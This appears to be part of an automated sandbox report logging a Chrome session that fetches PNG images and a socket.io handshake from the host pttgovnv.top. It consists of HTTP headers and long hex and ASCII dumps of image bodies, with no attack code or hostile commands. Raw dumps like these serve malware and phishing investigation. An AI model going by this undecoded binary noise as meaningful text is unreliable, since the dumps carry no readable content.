          2024-09-01 22:25:26 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 2d 53 6e 61 70 58 75 6b 63 78 56 72 4e 73 78 73 42 51 55 45 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"-SnapXukcxVrNsxsBQUE","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          71192.168.2.449815172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/42.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 12814
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"320e-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qaP0wMo7wX29nWJLsV9ayzNfT0I%2BC0NQ3v5hTFwEx1KJrFFcQJzUTuL4mfJq5YoK0Uf6cWyh5WGVAaSiDYRxM%2BDwhOk1i2d6VaPV7yjBwsxBclDeaGrTezsYwc8niE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19dad519cf-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 31 9b 49 44 41 54 78 da ec dd 4d 76 db 46 be 37 60 f8 3d 77 6e dd 15 88 bd 02 29 d3 4c cc ac c0 ca a8 87 a6 57 60 65 05 a6 57 10 79 05 a6 87 19 85 5e 81 a9 49 4f 43 ad 20 f4 0a ae b4 02 bf f8 5b 85 36 ad 48 22 3e 0a 24 28 3e cf 39 6c a5 2d 91 04 0a 1f f5 43 55 a1 f0 ec eb d7 af 05 00 00 fb e5 ff 29 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<1IDATxMvF7`=wn)LW`eWy^IOC [6H">$(>9l-CU)!!!@@@8888!!
          2024-09-01 22:25:26 UTC1369INData Raw: fc b1 28 5f ab 32 c8 4d 94 08 00 ec 61 7d fe f5 eb 57 a5 70 a0 ca 00 17 41 ee 45 f9 fa 52 be a6 e5 6b 9e 02 1e 4f f9 a0 ff e3 6a 5c fe 88 f0 3e 4a db bf 72 b9 83 c5 89 fd 6d 19 17 14 df 2e 2a fe fd 6d 9f dc 65 d9 44 b9 9c 95 af 3a ad d4 b1 dc 17 e5 32 af b6 b4 cd 62 b9 4e 6b 2e d7 7c d7 65 09 08 71 f4 1b e2 46 e9 84 ff 3c fd d3 4d 71 db 42 37 8f 9f 65 a0 5b 29 a5 27 17 e0 22 a4 7c 18 f8 62 5e a6 7d 70 be 8d 80 94 ca e5 28 ed fb 27 2d de fe ba 5c ce 59 8f cb 16 9f fd aa c5 5b 3f 96 cb 35 b1 d7 83 10 c7 d3 0d 72 71 75 ff e7 03 bf be 49 21 2f 2a b7 a8 4c 57 65 b0 73 75 bf bf 01 6e 5c fe f8 bc 67 8b 7d 55 be 2e 52 a0 bb ee b1 6c 96 2d 03 5c e5 97 3e 5a be ca e5 9a 96 3f de 76 f8 88 77 e5 72 4d ed fd 20 c4 f1 74 83 5c d3 8a e2 4b 0a 75 c2 dd 7e 85 b8 68 dd 7a
          Data Ascii: (_2Ma}WpAERkOj\>Jrm.*meD:2bNk.|eqF<MqB7e[)'"|b^}p('-\Y[?5rquI!/*LWesun\g}U.Rl-\>Z?vwrM t\Ku~hz
          2024-09-01 22:25:26 UTC1369INData Raw: 92 e9 e3 9e a7 31 77 43 12 c1 71 91 c2 ea 90 c4 05 d0 9f e6 d8 03 21 8e a7 13 e4 66 c5 e6 b1 4a 39 c6 31 bd cd 31 e5 47 0f 61 2e c6 05 2e 52 f7 32 db 0b 72 71 01 71 99 e9 e3 46 03 5c c5 b8 48 18 ea 93 25 2e ca 20 e7 c2 05 84 38 9e 48 90 8b 0a 75 fc 48 58 5b a4 a0 17 37 1b 7c 6a 19 9e be a4 ef c8 16 3e 33 86 b9 13 41 6e 27 a6 99 3e 67 a8 db ed c5 00 5b 09 ab 80 e9 86 10 18 b0 ff 51 04 34 0c 45 cb 14 62 e6 29 d4 ac 8b a9 21 a2 32 1a af 4f d1 91 fe fe e8 9e ca 74 7d 2c 50 3c ad 61 d9 e3 72 cf ca 1f b3 d4 5d 7b 5e b4 1f 67 15 ef fb ab fc 9c d7 e9 33 e9 59 4c 8f 51 86 9c ab 7b f6 b7 a6 86 dc aa 14 c7 cd 6a a0 cb 05 08 71 3c a1 20 b7 4a 53 8b 44 37 d0 ab 3b bf 8e 8a f6 db b4 21 55 28 bb 27 9c 2d 76 b8 ec 31 35 ca b7 40 57 74 1b cc 1e 8f 14 2b 04 b9 ad 99 67 08
          Data Ascii: 1wCq!fJ911Ga..R2rqqF\H%. 8HuHX[7|j>3An'>g[Q4Eb)!2Ot},P<ar]{^g3YLQ{jq< JSD7;!U('-v15@Wt+g
          2024-09-01 22:25:26 UTC1369INData Raw: a3 ac be a4 5f 45 0b 64 b4 cc c5 b3 4a 27 69 3a 92 a1 5b 64 de 27 8e d2 dd c8 e4 77 55 06 b8 a9 62 00 84 38 ba 56 d4 b3 f2 3f ff 2a 86 33 a6 6a eb 13 e9 56 dd ac 31 7f 5c f9 7f 7f 2a 5f ef 53 a0 8b bb 58 63 ae b9 ff 8b 1b 23 52 a0 1b 0d 74 73 36 09 71 75 a6 b4 88 3b 58 0d ba ef c7 44 11 00 4f 9d 1b 1b fa 0d 70 d1 12 d0 c7 7c 6f 21 ee 96 3c 4a 21 a8 a9 f3 5d 86 87 34 2d c9 b7 b9 f0 aa f9 e4 d2 2b fe fb db 33 61 cb 7f bf 4a 41 a8 7a 45 8b de 6a a7 db b3 5c ee f4 a4 8a 3a ea 2c 6b 6c bf 57 11 f2 4d c6 9a d5 6f e6 85 03 84 38 da 86 b7 b3 e2 c7 a9 36 72 8a d6 ab 69 59 49 cd d2 f7 fc d9 e2 33 e2 2e d5 f1 10 82 43 0a 74 cb 2a 54 ae 3d e5 61 94 5e f1 ff a7 e9 77 d5 db 16 6b c1 6e db 95 75 9d a9 46 6e 6a 2e 57 35 97 dc 45 61 5e b9 5c 3e 79 e6 27 20 c4 d1 26 bc 55
          Data Ascii: _EdJ'i:[d'wUb8V?*3jV1\*_SXc#Rts6qu;XDOp|o!<J!]4-+3aJAzEj\:,klWMo86riYI3.Ct*T=a^wknuFnj.W5Ea^\>y' &U
          2024-09-01 22:25:26 UTC1369INData Raw: ca 72 b7 56 03 0e 4b 37 99 f6 c9 33 9b 19 84 38 ea 5f 41 47 4b cc fb 0e 1f f3 b6 3c f1 f6 3e 31 f0 da 9d b6 9f 1a be f5 77 f3 c8 3d 28 c6 c1 9d d4 f8 bb 08 cf 13 c5 b5 f3 e3 35 db dd c0 3d b4 52 e7 5a 36 21 0e 84 38 9a 84 a3 d4 c2 d2 a5 55 2e ae ec 57 7d 5f 45 a7 65 3d 6b 11 3a ab 71 7c 23 5b fc bf 95 78 6c f3 3a 77 a3 46 80 1b 7b 2a c3 60 5c 66 fa 9c dc 21 6e 91 2b c4 79 94 1e 08 71 34 0f 48 71 12 ee d2 2a 57 4d 43 32 db 42 ab 5c 04 90 5f 8b 66 5d 38 d5 c4 c5 93 43 df d6 a9 0c 7e af f1 a7 df ee 44 15 e0 06 25 57 8b d7 8b cc 63 5a 73 85 b8 38 8f e8 b6 07 21 8e 16 e1 a8 6a 95 fb a9 c3 15 ff ab 14 96 c6 3d 2f eb bc 68 fe 44 8a a8 20 62 9c dc fc 50 af f6 53 80 fb 50 33 c0 8d dd 89 3a 38 39 6f 2c c9 76 c1 95 f1 e6 86 f0 d6 dd e5 20 c4 d1 fe 84 bc 4c 77 b0 be
          Data Ascii: rVK738_AGK<>1w=(5=RZ6!8U.W}_Ee=k:q|#[xl:wF{*`\f!n+yq4Hq*WMC2B\_f]8C~D%WcZs8!j=/hD bPSP3:89o,v Lw
          2024-09-01 22:25:26 UTC1369INData Raw: 65 1b df 1b e6 26 19 42 53 f6 80 9c 69 e2 6d ad af 20 c4 f1 04 83 dd a8 f8 e7 78 b5 27 79 63 c0 13 da 6e 51 a9 b7 b9 cb 32 c6 0f 9e 97 db 74 a6 14 1f 2d df b8 c8 a9 c6 9b 36 09 4e 71 dc 8c fb 6a d5 6e 38 0e f6 ae 5f cb e5 9a db ba 20 c4 71 18 95 58 5c b5 57 3f e7 9e b9 38 b8 6d 14 15 fa a4 b8 7f 0c e1 7d aa 6e f3 95 d2 6b 75 b1 53 1d 0b 0f 95 77 5c ec 6c 75 f2 e8 b5 e5 1a a5 9f 45 5a c6 93 b5 50 b9 2c 9e c0 f4 3a 20 c4 01 00 30 28 ff 4f 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 3b f5 3f 8a 80 c7 7c fd cf c9 69 f9 e3 68 ed 9f 96 cf 7e be ba 56 32 b5 ca 2e ca ed 74 ed 9f ae cb b2 5b 66 fe 8e
          Data Ascii: e&BSim x'ycnQ2t-6Nqjn8_ qX\W?8m}nkuSw\luEZP,: 0(OqqqBBB qqqB;?|ih~V2.t[f
          2024-09-01 22:25:26 UTC1369INData Raw: ec 73 59 ce 1a 96 e1 b4 c5 77 8c 1b 9e 44 2f 0e 78 f7 9e 16 f5 5b 7b 9e ef ba ac 62 9c 5b f9 9a a5 c0 b0 8d 8a 32 5a 27 3e 97 df 39 4f 01 a3 af 75 ba d8 e2 3a 15 e9 18 fc 3b ca 32 8d 1d ec 6a d2 f5 98 4e 2d 79 7f f7 50 06 b1 df fe 5e 7e fe 22 d3 ba de 1b 3e e3 f3 b7 bc 0d ef db a6 cb 14 ce 36 2e ef 00 ce 7b 2f 0e fc dc 2b c4 6d 29 74 9c a6 96 8a 37 03 59 a4 37 e5 32 cd 53 77 e1 53 0f 70 a1 4d 77 f5 a4 e1 df 1f a7 f1 79 87 e8 ac e7 bf cf dd ca b1 da d1 85 d4 cb 54 41 9e 65 5e a7 38 bf 2c 76 78 7e 89 b2 5c 65 58 af 26 ef 7f 7e f7 fb 52 30 ff bd e7 75 8d d0 90 3d c8 a5 d0 b4 dc 61 78 bb 1b 58 3f a4 8b 82 4d db eb f9 00 96 f7 55 81 10 d7 63 e8 88 83 f3 af 62 3b 63 05 9a 56 28 17 7b 56 96 b3 2d 1e b0 e3 16 ef 39 3d c0 fd 7b dc e2 44 fe 3c 5d d8 6c 3b c0 9d a7
          Data Ascii: sYwD/x[{b[2Z'>9Ou:;2jN-yP^~">6.{/+m)t7Y72SwSpMwyTAe^8,vx~\eX&~R0u=axX?MUcb;cV({V-9={D<]l;
          2024-09-01 22:25:26 UTC1369INData Raw: 8f 6e c9 9c dd 7f 75 9c 67 fa be b6 fb 41 93 73 67 dd 3a e2 4b d1 df 1c 9e 6d eb 08 21 4e 88 7b e2 2d 01 b7 dd 99 75 06 01 bf cb d9 8d 7a 67 19 16 fb 50 56 19 02 5c 8c 15 f9 49 80 63 4d 9b bb 0c 6f 7a 9a cf ac 6d 77 e2 b8 87 65 f9 90 ee 12 cc 12 e4 d2 cd 00 3f a5 73 5d dc 14 50 4d 1a fc 53 9b 31 69 1d 7d 49 5d 84 39 b4 3d 77 3e 6f 50 7e b3 a2 de f8 bb 49 8f e5 68 6a 8e 03 65 8a 91 7a 21 2a a6 fb 88 ff 7c e8 b6 ea cb f8 9b 43 2e a3 34 b7 5d d7 00 37 ee 2b 08 b3 87 c7 5d fb 47 3d f5 32 76 2b 2a e0 72 99 a2 b2 6e 3a 19 f0 f8 91 cf 8c 07 af b7 5d a4 b7 a9 45 2e ce 3d f3 ae 01 21 dd 29 39 84 e3 2f e7 30 8a 6d ad 4f 35 87 de 43 17 1d ef 4c af 81 10 b7 fb 20 37 4b 07 6b b4 38 8d 52 68 59 f5 d9 72 94 5a b7 ce 86 5c 36 19 02 dc b7 f9 92 04 38 ea 86 9f 0d fa ac 2c
          Data Ascii: nugAsg:Km!N{-uzgPV\IcMozmwe?s]PMS1i}I]9=w>oP~Ihjez!*|C.4]7+]G=2v+*rn:]E.=!)9/0mO5CL 7Kk8RhYrZ\68,
          2024-09-01 22:25:26 UTC1369INData Raw: e6 08 1c f1 99 af 8b ee d3 16 e9 be 6b 3f c9 7b 94 fd 69 e6 00 37 b6 39 84 38 fe 79 80 b6 f1 ae 87 16 a3 d1 c0 cb ea d1 00 b7 16 e4 a6 45 fb f9 8c 5e a4 b1 75 08 71 4f ae 42 2b 03 5b b4 96 45 cb d6 e7 b5 d7 df b9 e7 68 8b d6 b3 74 a7 6b 9c 53 ba 4c 26 2c c4 b5 af 23 ce 7a e8 3e 1d d9 1c 42 1c 79 2a 82 8b 01 2d cb 76 2a a0 1a 01 6e cd a4 c3 57 c5 23 b9 9c ac 0e c7 62 cb 95 6b db 00 36 2a 5f 31 fd c7 75 f9 fa 9a 5e 8b 74 a3 41 9d f7 47 a8 8a 67 97 de d7 aa d3 cb 1c 6d a9 2b 74 dc e1 a2 ca dd 90 ed ce cb 5f 7a ea 42 15 aa 85 38 32 5c d9 5c ad 0f e8 3f 94 10 d7 30 f0 c5 09 ec 53 cb b7 7b 24 d7 01 49 ad 15 6d 5a 8b 5e e4 ec 8a dc 10 c0 aa 49 c0 ef 3e 7e 2f c2 d7 9f 9b 1e 5b 95 1e 8a be e9 81 f7 27 7d ec f7 29 c8 4d ed 69 ad b6 fb 51 d1 ae 2b 75 d1 c3 b2 8c 8a
          Data Ascii: k?{i798yE^uqOB+[EhtkSL&,#z>By*-v*nW#bk6*_1u^tAGgm+t_zB82\\?0S{$ImZ^I>~/['})MiQ+u
          2024-09-01 22:25:26 UTC1215INData Raw: bc c5 49 a8 ce df b7 19 ef d1 f4 3d 4d 4f 6e 37 2d c2 4f d3 65 fa d2 a4 95 30 05 e9 cb 1e ca bf af 30 17 95 e7 af 03 69 09 39 eb da da 10 e1 27 85 d3 f7 c5 ee c5 7e 70 da b0 05 ae d3 be da e1 bb 36 1d 97 37 7d 2e 7b 0a 51 db dc 0f bf 3c b2 cf b5 69 74 58 35 58 d7 de cb 13 21 ae af 20 77 ba 85 0a 2b 5a 16 46 55 eb db 03 ce 1a 06 ca 8b 9e fe f6 a6 e8 67 ce a8 49 c3 f5 9b d7 fc 9b 26 27 9e f7 29 d0 14 0d cb ee a6 a7 b2 6e 1b 9a a7 2d be e3 a2 e7 bf cf 1d e4 62 db 8e 8a db 56 ea 6d 87 b9 77 eb 2d 21 19 d7 29 ba c5 7e 2a 76 33 b1 6e 1c 7b af cb 65 18 6f 98 e3 2e f7 be 37 ed 69 ff b8 de c6 79 2d ed 03 e3 a2 df 56 a7 9b b4 cf 9d 3e b4 cf ad 0d 37 b8 19 c8 31 7f 53 b8 21 a6 bf 6c f2 f5 eb 57 a5 d0 f4 60 bd 9d 0e 23 76 ca e3 8c 07 66 1c 90 d3 ba ad 26 69 32 e1 b8
          Data Ascii: I=MOn7-Oe00i9'~p67}.{Q<itX5X! w+ZFUgI&')n-bVmw-!)~*v3n{eo.7iy-V>71S!lW`#vf&i2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          72192.168.2.449818104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/36.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC723INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 7852
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"1eac-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3svt9jeZNpxOhIRG9zmd2k8bQJRnkvXT0urFO2DLUnmK6Tr3hrCd17yHzQ6g%2FiL2qjIb%2BD0UA3Zd1mcD0NlCkq9rqmLXBzB%2FUocV1V9Sx8IiXDczOhRhuqUOr4H45fY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19db8c7c7e-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC646INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 1e 39 49 44 41 54 78 da ec dd 4f 72 db 46 da 07 60 64 2a fb f8 ab ca de ca 09 e2 9c c0 cc 2a 4b 2b ab d9 4c 95 e1 13 44 39 81 e9 13 44 3e 41 a8 aa d9 cc 2a d2 32 ab a1 4e 10 e9 04 23 ed 53 35 d6 05 92 0f 6d b5 12 8e 22 fe 69 10 04 5f 80 cf 53 c5 d2 8c 23 89 54 83 04 7e e8 3f 6f 7f f2 fb ef bf 57 00 00 0c cb 27 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<9IDATxOrF`d**K+LD9D>A*2N#S5m"i_S#T~?oW'B qqqBBBB
          2024-09-01 22:25:26 UTC1369INData Raw: 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 84 f3 db cf 9f 3f 6b be 1c 37 8f 17 f9 f1 e0 aa 79 9c fe ed 9b 5f 6f b4 12 00 08 71 c4 09 6f 93 e6 4b dd 3c 5e af f9 d6 37 4d 90 9b 69 31 00 10 e2 d8 7f 78 9b 36 8f 97 05 3f f6 75 13 e4 e6 5a 0f 00 84 38 fa 0f 6f 47 cd 97 59 61 78 7b 70 d9 84 b8 89 56 04 00 21 8e 7e 03 dc b4 f9 f2 76 cb 5f f3 7f 4d 90 fb a0 35 01 e0 7f 7d aa 09 d8 41 78 4b 0b 15 66 cd e3 cb 0e 7e 5d fa 5d 73 ad 0a 00 ff eb 6f 9a 80 8e 03 dc 49 f3 e5 97 8e 02 1c 00 b0 84 9e 38 ba 0a 6f a9 64 c8 ac 79 bc ea f8 57 4f 2a 3d 71 00 20 c4 b1 93 00 97 86 3c cf 9b c7 f3 1d fc 7a 01 0e 00 9e 60 38 95 6d 03 dc 71 0e 5a cf b5 06 00 08 71 0c
          Data Ascii: qBBB qqq?k7y_oqoK<^7Mi1x6?uZ8oGYax{pV!~v_M5}AxKf~]]soI8odyWO*=q <z`8mqZq
          2024-09-01 22:25:26 UTC1369INData Raw: c0 21 d1 13 37 cc 00 97 42 4c 49 20 4b a5 3a 76 bd 2b c3 ac 45 80 bb 2b 0d 70 d9 f1 a3 ff 3f f5 ae 00 40 88 63 08 52 20 2b 59 cc 70 b2 cb 1d 0c 72 af e0 ab c2 1f 6b 1b e0 1e 87 b6 cb 5d d7 bb 03 80 88 0c a7 0e 4c 9e 77 f6 4b c1 8f ec 74 a8 b1 c5 eb 59 0c 70 57 2d 9e 2f fd 2d 8b 8b 39 be 68 7e cf 8d 77 46 bf fe fe f7 7f 4c 82 be b4 ab 7f fd eb 9f 1f 7a 6c 87 a3 e6 cb 51 fe bf 8b ff 9b 9e 35 c7 7d da e1 79 cd b1 5c f3 39 b3 b5 61 0c 4a 8c 0c 4f 98 c5 0c 0b 3b 32 94 aa b7 28 73 b2 78 a2 7e df 67 80 6b 2e d8 8f e7 e2 45 f2 55 73 11 bb ea a9 1d 4a 8b 4b f7 e9 8b e6 f1 61 07 7f 73 ba 59 79 fc f8 ac 22 82 cb b6 e7 b9 7c 0e 4b c7 72 92 1f 29 b8 3d d7 a4 ab 6f c2 9b f3 ee 33 cd 20 c4 51 7e c2 49 27 99 97 05 3f b2 eb 90 33 6b 71 c2 7b d3 b6 20 ef a3 bf ff ae ea 7f
          Data Ascii: !7BLI K:v+E+p?@cR +Yprk]LwKtYpW-/-9h~wFLzlQ5}y\9aJO;2(sx~gk.EUsJKasYy"|Kr)=o3 Q~I'?3kq{
          2024-09-01 22:25:26 UTC1369INData Raw: e5 b9 70 4a 4f 0c 47 bd e2 f3 3e 75 2c f7 4a 2f 9c 10 47 1f 21 ae cb 6d b6 72 2f 5c e9 89 73 da f2 b9 1e 86 4a fe a8 07 b7 62 1e 5c 6a 97 b6 db ea dc 16 9e 90 a2 86 97 f3 9e b7 d9 1a 62 8d bc da 29 64 30 de 2d 5b 65 9d 3f ef 6f 35 51 d8 cf 19 42 1c 4b 4c 0a bf ff b2 e3 e7 2f 0d 64 ad 56 2f 3d 0a 70 55 0e 70 37 2b 82 e5 36 27 94 7a d3 a0 9b 8b c3 46 9d 4f d5 e7 36 5b e9 22 1a 75 61 87 10 37 7c b7 cb 86 51 3b f8 bc b3 bd 0b 9b dd 0b 71 94 07 9b 49 b5 c7 61 bc 96 bd 70 db 04 b8 87 a1 d1 37 6b 0a 15 cf b6 68 97 8b c2 22 c8 91 6b c3 59 95 ba a2 46 5e f0 e0 c9 e6 61 7b 9b cf 3b bb bf 51 42 88 63 89 17 7b 7e fe 69 8b 9f 29 9a 37 f1 44 80 3b 5b 53 d0 77 9b 82 ad 77 55 79 cf 4c d4 da 70 7d f6 c2 3d ab e2 ce 45 3a 6d 19 0c 88 e3 72 c5 6a 54 05 9a f7 2f 8d ae 28 2d
          Data Ascii: pJOG>u,J/G!mr/\sJb\jb)d0-[e?o5QBKL/dV/=pUp7+6'zFO6["ua7|Q;qIap7kh"kYF^a{;QBc{~i)7D;[SwwUyLp}=E:mrjT/(-
          2024-09-01 22:25:26 UTC1369INData Raw: 38 f7 ed 71 10 48 cf f1 22 40 8f c0 be 45 fd db 57 cd 2b ab 03 b7 a7 5e b8 61 49 15 00 be 6b 79 1e ec f4 fd 9e cf 79 55 3e 07 a6 ff 3d d7 53 88 10 c7 3a a9 37 ad a4 3e 58 aa 61 77 b2 8b 70 95 7f 67 e7 17 c1 1c d8 26 f9 f1 22 3f 3e 73 e8 43 1b ea 66 f7 7a 8c 37 a7 07 ec 4f cf ab 3f 7b 97 ff 58 b0 d3 84 cb 74 c3 3c cf 37 b4 33 cd 84 10 c7 53 3d 07 9b 84 b8 8b 1c de 6e 86 f0 47 e5 d5 8b 69 a8 b0 ae e2 ae bc 64 f5 fb f2 29 91 8b fb 5e d8 a1 a1 88 b6 5a ef b3 7c 7e 7e 95 86 7e f3 e7 e2 74 57 23 14 0c 93 39 71 87 7c f0 ef 77 88 f8 b6 ba 1f 22 7d 2c 75 f1 a7 39 69 5f 34 df 77 3c 84 00 97 e6 4b 35 8f d4 1b f2 9f e6 f1 83 00 37 48 ab e6 95 85 de 66 cb a1 2b 72 a3 09 8a 03 dd db d4 6e b9 86 28 7c a4 27 4e 90 4b a1 e7 59 73 62 98 2c 9e 60 87 b4 b7 60 9e ec 9e 4e 6c
          Data Ascii: 8qH"@EW+^aIkyyU>=S:7>Xawpg&"?>sCfz7O?{Xt<73S=nGid)^Z|~~~tW#9q|w"},u9i_4w<K57Hf+rn(|'NKYsb,``Nl
          2024-09-01 22:25:26 UTC1369INData Raw: ec 7e 6c f2 b6 60 fb 9c da 20 c4 09 71 10 5f f0 95 7b 7d 5e e8 ea c0 87 69 b6 26 a8 44 35 77 73 f2 a4 0b b5 e1 42 87 dc bb 00 e5 4d 10 e2 60 23 51 e7 81 5d db 66 eb a3 75 35 f2 9e 05 7e 6f ed 2d c4 0d 78 91 ca c1 fb ed e7 cf 53 80 db 67 af f8 cc 51 10 e2 20 bc e0 17 ba 59 8f ed 30 a9 86 3b ec 16 79 3e dc 3e 03 66 e4 52 31 42 c2 ea 00 b7 ef 73 92 02 cc 42 1c 0c 82 da 70 f7 6a ed b0 13 93 3d 3e f7 89 e3 39 a8 f0 f6 2c 48 80 3b b3 d5 96 10 07 43 11 f5 42 77 61 9b ad fb 0b ca c0 8b c1 d6 b9 b7 b7 57 c1 4b e6 e8 e5 f9 6b 80 4b 9f bf ab 2a c6 a8 c0 d4 11 11 e2 20 bc bc 1a f3 e0 6b c3 35 ed 50 57 b6 64 da 95 d4 ae f3 3d 04 b9 c8 9b dd ab 3d 76 1f dc 8e 9a c7 49 f3 48 37 6b 3f 55 31 a6 33 e8 85 3b 40 9f 6a 02 06 aa 0e fa ba ee 2a 05 7e 3f b6 43 cf 35 f2 76 25 dd
          Data Ascii: ~l` q_{}^i&D5wsBM`#Q]fu5~o-xSgQ Y0;y>>fR1BsBpj=>9,H;CBwaWKkK* k5PWd==vIH7k?U13;@j*~?C5v%
          2024-09-01 22:25:26 UTC361INData Raw: 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 5a 01 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e
          Data Ascii: qqqBBB qqqqBBB qqqqBBB qZ@@@888!!!!@@@888!!!!


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          73192.168.2.449814172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/43.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
